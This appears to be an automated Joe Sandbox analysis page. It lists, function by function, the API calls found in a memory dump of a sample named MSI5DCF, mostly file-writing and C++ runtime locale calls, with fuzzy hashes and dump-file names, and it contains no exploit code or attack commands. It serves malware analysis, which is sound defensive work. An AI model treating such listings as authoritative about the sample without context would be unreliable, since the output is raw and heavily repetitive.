                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                        • String ID:
                                                                        • API String ID: 4244582100-0
                                                                        • Opcode ID: b78170012a81fa39c79d76983dd328f5ad6dbcd09836111ac8e23e1107ab38d9
                                                                        • Instruction ID: 29cc922d6895450b7fdb7538d9f519d2966d27a66c1b6ab2126c053575aa1b1f
                                                                        • Opcode Fuzzy Hash: b78170012a81fa39c79d76983dd328f5ad6dbcd09836111ac8e23e1107ab38d9
                                                                        • Instruction Fuzzy Hash: 81213935A00A169FDB04EF25C891AADB7B5FF49710F008559E9269B7E1DF30ED50CB80
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,B7207CF4), ref: 00AE143C
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE145C
                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE148D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AE14A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                        • String ID:
                                                                        • API String ID: 3604237281-0
                                                                        • Opcode ID: 0b5c28edc6fb9991b90a07768a99b2ed98f34a2a86077f21a1a0ea87e5142e89
                                                                        • Instruction ID: 11c7b48899e98e5bcde0d1993f494a72c065ab7fbe1f1574cb911e9d66e1e6df
                                                                        • Opcode Fuzzy Hash: 0b5c28edc6fb9991b90a07768a99b2ed98f34a2a86077f21a1a0ea87e5142e89
                                                                        • Instruction Fuzzy Hash: 1321B1B1940314ABD7208F54DC09F9ABBF8EB09B24F204259F504A72D0DBB45A05C794
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE80CC
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE80D6
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE8127
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8147
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 32ba888eb57a0f23f0118058bfc591b696391c54707d38737355e36ed2168e16
                                                                        • Instruction ID: 6121ec917bd9ed4ae44f44bfe595d2311756ca6069fe03fc68ffd5be67615048
                                                                        • Opcode Fuzzy Hash: 32ba888eb57a0f23f0118058bfc591b696391c54707d38737355e36ed2168e16
                                                                        • Instruction Fuzzy Hash: A301F571D00299DBCF00EBA4DA456BE77B1AF80710F250549F5256B3D2DF38AE02CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE81F6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE8200
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE8251
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8271
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE8161
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE816B
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE81BC
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE81DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE2700
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE270A
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE275B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE277B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE2795
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE279F
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE27F0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2810
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF39F2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF39FC
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3A4D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3A6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE79D0
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE79DA
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7A2B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7A4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3A87
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3A91
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3AE2
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3B02
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7AFA
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B04
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7B55
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7A65
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7A6F
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7AC0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7AE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7B8F
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B99
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7BEA
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C0A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3CDB
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3CE5
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3D36
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3D56
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 7d2c9a0c2dd93d3755a7186473b14707eb7b76132c2135b92c0363d7a9810fdb
                                                                        • Instruction ID: 968190fbe22dea53c880375c3a86116ce5038650ca7b7d2a6f60e2fbbf3756ef
                                                                        • Opcode Fuzzy Hash: 7d2c9a0c2dd93d3755a7186473b14707eb7b76132c2135b92c0363d7a9810fdb
                                                                        • Instruction Fuzzy Hash: 6001C0329102199FCF04EBA4E9456BE77A1AF84310F640509F6126B391DF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3C46
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3C50
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3CA1
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3CC1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: b9818578b0a72d373c6765157071d4c7f3105b05c4c5a9d985c506f27487206b
                                                                        • Instruction ID: 9047221a0f3888f016de37785da66f1f9a8f6bdb834d0653a0fdc7c9890211bb
                                                                        • Opcode Fuzzy Hash: b9818578b0a72d373c6765157071d4c7f3105b05c4c5a9d985c506f27487206b
                                                                        • Instruction Fuzzy Hash: 2C01C03691061D9BCF00EBE4DA056BEB7A1AF84710F244509F9116B391DF74AE068B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7E78
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7E82
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7ED3
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7EF3
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: bdab8e17f4b3aac31ab0eb6451290f681c1d2622a94db1910b81140bae2e04a8
                                                                        • Instruction ID: 59730044c4dd295bcc4a4b078e137a99b741d269652dd6cd34161d68c9155975
                                                                        • Opcode Fuzzy Hash: bdab8e17f4b3aac31ab0eb6451290f681c1d2622a94db1910b81140bae2e04a8
                                                                        • Instruction Fuzzy Hash: 1A01F535D00259DFCF05EBA4EA456BE77B1AF84310F240549F5116B392DF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7FA2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7FAC
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7FFD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE801D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 83245d41665443fb0a2613284b70f1efb2b95c5af7584e7c072b5a83f743ef5a
                                                                        • Instruction ID: 9386c8ecc4d4526b05bc9d3d774857d5ef06ada3fbc930a9e52176efd28042ba
                                                                        • Opcode Fuzzy Hash: 83245d41665443fb0a2613284b70f1efb2b95c5af7584e7c072b5a83f743ef5a
                                                                        • Instruction Fuzzy Hash: A501F535D40259DBCB00EFA4DA456BE77B1AF84320F250109F5116B3D2DF34AE01CB91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7F0D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7F17
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7F68
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7F88
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 5e613a04cc141d2cd8e5048baf72f7bbae01902faf26e765c07f14e457c2fac4
                                                                        • Instruction ID: 4b7ba57b9ef0a01308dbeab42dc89110e1424fd68a88dcf77fea4b916f88bb24
                                                                        • Opcode Fuzzy Hash: 5e613a04cc141d2cd8e5048baf72f7bbae01902faf26e765c07f14e457c2fac4
                                                                        • Instruction Fuzzy Hash: 2901D2329006599BCB04EBB5DA456BE77B1AF80310F244509F4116B3D2DF34AE01CB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE5C6D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE5C78
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE5CE6
                                                                          • Part of subcall function 00AE5DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AE5DE0
                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00AE5C93
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
